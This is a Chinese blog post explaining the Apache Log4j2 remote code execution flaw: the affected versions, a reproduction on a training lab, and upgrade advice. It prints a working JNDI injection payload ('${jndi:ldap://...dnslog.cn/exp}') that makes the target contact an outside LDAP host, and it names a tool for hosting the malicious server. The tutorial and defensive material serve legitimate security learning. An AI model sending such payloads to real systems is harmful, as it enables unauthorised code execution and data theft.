- 漏洞描述
- 漏洞影响范围
- 漏洞复现
- 步骤:
- 深度利用——反dshell
- 防御措施
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。
在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。
漏洞影响范围2.0 <= Apache Log4j2<= 2.14.1
如果Java应用中引入了log4j-api、log4j-core两个jar,则极大可能受到影响。电力运营商金融行业,都是重灾区。
这个漏洞在安全圈掀起了轩然大波,由于具体的payload公开,大量的网站都存在这个问题,例如百度、ICloud等等知名网站。攻击者能够通过该漏洞进行数据窃取、挖矿、勒索,堪比互联网内的“新冠”。被圈内人称为核d级漏洞、史诗级漏洞也毫不夸张。
漏洞复现漏洞复现平台:云演
地址:https://www.yunyansec.com/#/experiment/vulndetail/123/0
步骤:-
打开靶场网址
-
构造如下插件中所示的payload,执行,页面已经出现OK,证明执行成功
url: xxxxxx/hello
发送post请求
payload=${jndi:ldap://xxxxx.dnslog.cn/exp}
-
如下所示,dnslog网站已经成功回显我们要攻击的靶机ip,证明恶意payload执行成功。说明该网站存在Apache log4j2远程代码执行漏洞。
利用此工具(JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)构造一个LDAP 或 RMI服务器。
接下来构造payload…跟上面的用dnslog来验证是否存在漏洞过程相同。
此漏洞就是这么简单,正所谓 *** 作简单,而危害却极大,所以它犹如核d一般,爆出来后,所向披靡,杀疯了,在安全圈炸了锅。。。
防御措施- 排查应用是否引入了Apache Log4j2 Jar包,若存在依赖引入,则可能存在漏洞影响。请尽快升级Apache Log4j2所有相关应用到最新的log4j-2.15.0-rc2 版本。
地址:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 - 升级已知受影响的应用及组件,如 spring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink
- 可升级jdk版本至6u211 / 7u201 / 8u191 / 11.0.1以上,可以在一定程度上限制JNDI等漏洞利用方式。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)